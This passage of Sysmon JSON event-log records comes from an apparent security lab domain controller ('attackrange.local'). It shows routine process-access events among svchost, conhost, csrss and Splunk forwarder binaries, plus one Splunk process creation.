0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0423-5F25-0000-0010698A0B00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0423-5F25-0000-0010698A0B00}","TargetProcessId":"4636","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.072\r\nProcessGuid: {A837DB8D-0425-5F25-0000-0010678C0B00}\r\nProcessId: 1344\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.072","ProcessGuid":"{A837DB8D-0425-5F25-0000-0010678C0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-0010678C0B00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-0010678C0B00}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-0010678C0B00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-0010678C0B00}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
